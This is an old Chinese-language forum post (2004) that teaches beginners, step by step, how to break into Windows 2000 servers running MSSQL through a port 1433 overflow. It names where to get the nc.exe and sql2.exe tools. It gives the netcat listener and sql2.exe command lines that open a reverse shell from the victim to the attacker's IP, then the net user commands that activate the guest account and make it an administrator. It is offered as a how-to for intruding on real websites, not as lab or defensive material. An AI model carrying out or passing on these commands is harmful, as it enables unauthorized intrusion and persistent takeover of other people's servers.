[这个贴子最后由bigblock在 2004/02/28 07:09pm 第 1 次编辑]
在win2000机器上装了mssql的话,机器就会开1433端口。
什么是端口,就像食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。
在机器上买mssql就上1433窗。溢出1433需要两个工具:nc.exe和sql2.exe,在www.sandflee.net都有下载。
进攻方法就两步:第一步,在自己机器上开一个cmd窗口。对了,你要用win2000的话,就开始-运行-写入cmd回车。这里我们只用2000,不说98。如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话,就在你开的这个窗口下打入命令c:>nc -l -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。第二步:再在开始-运行-写入cmd回车,再开一个窗口。在这个窗口写命令行c:>sql2.exe 你要入侵网站的ip 自己的ip 40 0回车。
这里要作点说明:如何得到入侵网站ip?在cmd下c:>ping www.xxxxx.com
就可以看到了。自己的ip呢?在cmd下c:>ipconfig就可以看到了。其中命令行中的40你可以随意改成别的,但好像40和53成功率高一点。再是命令中的0不行的话,你就试试1或2。如果入侵网站有这个漏洞话,那么你开的第一个窗口就会变成肉鸡的c:winntsystem32>.就是说,你已经进入它的机器里了。进去以后,你可以填加个用户了。net user guest /active:yes用这个命令,就将默认禁止的guest用户激活。net user guest 123456这样guest的密码变成123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。 |
